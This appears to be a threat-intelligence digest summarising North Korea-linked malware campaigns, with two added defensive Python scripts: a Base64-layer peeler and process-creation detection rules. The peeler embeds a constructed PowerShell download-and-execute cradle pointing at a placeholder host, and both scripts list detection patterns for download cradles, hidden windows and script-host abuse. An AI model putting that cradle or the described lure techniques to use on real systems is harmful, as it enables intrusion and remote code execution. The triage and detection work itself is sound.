Konni is linked to a malicious Windows shortcut disguised as a KISA notification PDF that appears designed to exploit public concern around a recent SK Telecom breach. The shortcut abuses mshta.exe to run obfuscated JavaScript that launches PowerShell, wr…
The Medium analysis reviews two Base64-encoded PowerShell payloads attributed to Kimsuky-related activity and XWorm RAT. After decoding, the scripts show staged behavior: PowerShell and CMD execution, fileless or obfuscated script execution, download of a…
Flashpoint investigated the DPRK remote IT worker fraud scheme by pivoting from domains named in a December 2024 US indictment into compromised credential and infostealer-log data. Analysts linked fake company domains, reused registrant email accounts, Pa…
Genians identified Operation ToyBox Story as a March 2025 APT37 spear-phishing campaign against activists and experts working on North Korea issues. The lures impersonated a North Korea-focused expert and a South Korean national security think tank event,…
Genians analyzed Operation ToyBox Story, a March 2025 APT37 spear-phishing campaign that targeted activists and experts focused on North Korea. The attackers impersonated a South Korean national security think tank event and a North Korea-focused expert, …
Kimsuky activity used an NDA.pdf.msc lure that looked like a PDF through a Microsoft Edge icon but executed as a Windows MSC file. Triple Base64-decoded content launched PowerShell to download password-protected RAR payloads and UnRAR from 109.107.157.107…
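The layered Base64 wrapping described in the Kimsuky/XWorm PowerShell analysis above and in the NDA.pdf.msc report (three Base64 layers before PowerShell runs) is a common triage task. The script below is an added example, not code from either report or from any vendor: it peels Base64 layers until plaintext appears, handling both UTF-8 and the UTF-16LE form that PowerShell's -EncodedCommand expects, and then flags strings a responder would look for (download cradle, Invoke-Expression, hidden window, archive extraction). The payload is constructed in the script itself: a hypothetical download cradle with a placeholder URL, wrapped in three layers the same way the real samples were wrapped, so nothing here is a real indicator.

```python
import base64
import binascii
import re

# Constructed sample, NOT the script from either report: a hypothetical
# download cradle wrapped in three Base64 layers. The innermost layer is
# UTF-16LE, the form PowerShell's -EncodedCommand expects; the URL is a
# placeholder.
INNER_SCRIPT = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2.ps1')"
)


def wrap_layers(script: str) -> str:
    """Build the constructed three-layer sample blob."""
    layer1 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    layer2 = base64.b64encode(layer1.encode("ascii")).decode("ascii")
    return base64.b64encode(layer2.encode("ascii")).decode("ascii")


SAMPLE_BLOB = wrap_layers(INNER_SCRIPT)

B64_TEXT = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Strings worth flagging once the plaintext script is reached.
INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
        re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "archive-extract": re.compile(r"\bunrar\b|Expand-Archive|\b7z\b", re.I),
}


def _is_ascii_text(s: str) -> bool:
    return s.isascii() and all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_one_layer(text: str):
    """Decode one Base64 layer, or return None if `text` is not Base64.
    UTF-8 is tried first, then UTF-16LE; a result is accepted only if it is
    printable ASCII, so binary garbage is never mistaken for a layer."""
    compact = "".join(text.split())
    if len(compact) < 8 or not B64_TEXT.match(compact):
        return None
    compact += "=" * (-len(compact) % 4)   # tolerate stripped padding
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    for encoding in ("utf-8", "utf-16-le"):
        try:
            decoded = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if decoded and _is_ascii_text(decoded):
            return decoded
    return None


def peel_base64(blob: str, max_layers: int = 10):
    """Strip Base64 layers until plaintext appears.
    Returns (intermediate_layers, final_text)."""
    layers, current = [], blob
    while len(layers) < max_layers:
        nxt = decode_one_layer(current)
        if nxt is None:
            break
        layers.append(nxt)
        current = nxt
    return layers, current


def find_indicators(script: str):
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


def analyze(blob: str) -> dict:
    layers, script = peel_base64(blob)
    return {"layers": len(layers), "script": script,
            "indicators": find_indicators(script)}


if __name__ == "__main__":
    result = analyze(SAMPLE_BLOB)
    print(f"peeled {result['layers']} Base64 layer(s)")
    print("script:", result["script"])
    print("indicators:", result["indicators"])
```

The UTF-8-then-UTF-16LE order matters: UTF-16LE bytes of an ASCII script decode as UTF-8 into a string full of NUL characters, which the printable-ASCII check rejects, while the reverse order would happily turn ordinary Base64 text into CJK-looking garbage. Real samples often add a Deflate/GZip or XOR stage between layers, which this peeler does not attempt; when it stops early on a blob that still looks encoded, that is the next thing to check.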
KISA warned that attackers were impersonating the Korea Internet & Security Agency with an attachment named KISA알림.pdf.lnk. The advisory says the lure likely referenced KISA security services or recent SK Telecom breach news, although the original phishin…
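The KISA알림.pdf.lnk shortcut above, the NDA.pdf.msc lure, and the mshta.exe-to-PowerShell chain in the Konni entry share two detectable traits: a document extension immediately followed by an executable one, and a script host or console spawning a shell. The rules below are an added example of how a detection engineer might express that over process-creation telemetry; they are not from KISA, Genians or any vendor report. The events are constructed Sysmon-style records with placeholder paths, PIDs and command lines (only the lure file names come from this page), and the rule thresholds and name lists are my assumptions. mmc.exe is listed as a suspicious parent because Windows opens .msc files with it.

```python
import re

# Constructed Sysmon-style process-creation events (a subset of Event ID 1
# fields), NOT telemetry from the incidents above. Lure file names are the
# ones named on this page; paths, PIDs and command-line contents are
# placeholders.
SAMPLE_EVENTS = [
    {"pid": 3120, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe javascript:eval(unescape("%76%61%72%20%78%3d"))'},
    {"pid": 3133, "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc U0FNUExF"},
    {"pid": 3200, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r'"C:\Windows\System32\mmc.exe" "C:\Users\u\Downloads\NDA.pdf.msc"'},
    {"pid": 3215, "parent": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoP -W Hidden -c "Start-Sleep 1"'},
    {"pid": 3300, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\u\Documents\report.docx"'},
    {"pid": 3310, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]

# A document extension immediately followed by an executable one.
DOUBLE_EXT = re.compile(
    r"[^\\/\"']+\.(?:pdf|docx?|xlsx?|pptx?|hwp)"
    r"\.(?:lnk|msc|hta|js|jse|vbs|wsf|scr|exe)\b", re.I)
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.I)
ENCODED_CMD = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+\S+", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

# Parents that should not normally be launching a shell (assumed list).
LOLBIN_PARENTS = {"mshta.exe", "mmc.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lure_name(text: str):
    """Return the double-extension file name found in text, or None."""
    m = DOUBLE_EXT.search(text)
    return m.group(0) if m else None


def detect(events):
    """Run the rules over process-creation events.
    Returns a list of (rule, pid, detail) tuples."""
    findings = []
    for ev in events:
        img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        lure = lure_name(cmd)
        if lure:
            findings.append(("double-extension-lure", ev["pid"], lure))
        if img == "mshta.exe" and INLINE_SCRIPT.search(cmd):
            findings.append(("mshta-inline-script", ev["pid"], cmd[:40]))
        if parent in LOLBIN_PARENTS and img in SHELLS:
            findings.append(("lolbin-spawns-shell", ev["pid"], f"{parent} -> {img}"))
        enc = ENCODED_CMD.search(cmd) if img in SHELLS else None
        if enc:
            findings.append(("encoded-command", ev["pid"], enc.group(0).strip()))
        hidden = HIDDEN_WINDOW.search(cmd) if img in SHELLS else None
        if hidden:
            findings.append(("hidden-window", ev["pid"], hidden.group(0)))
    return findings


def rules_by_pid(events):
    """Group fired rule names by process id for quick triage."""
    out = {}
    for rule, pid, _ in detect(events):
        out.setdefault(pid, set()).add(rule)
    return out


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

Note what the .lnk case does and does not give you: when a user opens the shortcut, explorer.exe launches mshta.exe with the shortcut's own command line, so the lure file name never appears in the process event. The double-extension rule therefore belongs on mail-gateway and file-creation telemetry (lure_name() can be run on attachment names directly), while the process chain is caught by the mshta inline-script and parent-child rules. The benign Word and interactive PowerShell events are included to show that the rules stay quiet on ordinary activity.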
Wazuh describes InvisibleFerret as a Python-based backdoor used in North Korea-linked campaigns, especially Lazarus recruitment-themed operations against technology, finance, and cryptocurrency professionals. The malware is delivered as a second-stage pay…
The report analyzes PebbleDash, a backdoor historically associated with Lazarus and more recently observed in activity linked to Kimsuky. The malware appears to depend on a preceding loader or installation stage to place configuration data and persistence…
There has been an increase in targeting of European and Japanese organizations in this campaign, likely as a result of increased awareness among U.S.-based organizations and actions taken to combat the threat. The origins of this campaign, publicly tracke…
WaterPlum, also known as Famous Chollima or PurpleBravo, is described as a North Korea-linked actor targeting financial institutions, cryptocurrency businesses, and FinTech companies worldwide. The Japanese-language analysis says OtterCookie evolved from …
NTT analyzed updated OtterCookie malware used by WaterPlum, also tracked as Famous Chollima or PurpleBravo, against financial, cryptocurrency, and FinTech targets. The malware evolved from a file grabber into v3 and v4 variants with Windows support, hardc…
Kimsuky activity used a phishing email impersonating South Korea's National Tax Service with an April filing and payment deadline notice as the lure. The message came through Mail.ru infrastructure and sent recipients to a spoofed Naver login flow on e-in…
A report from Yonhap states that a digital signing certificate associated with CJ OliveNetworks was found in malware described by security sources as North Korea-linked. The certificate had reportedly been abused to make malicious files appear legitimate,…
Supply chain targeting has become a hallmark of the DPRK’s cyber strategy, underpinning the regime’s theft of more than $6 billion in cryptocurrency since 2017. Initial access involved social engineering, likely approaching the developer via platforms lik…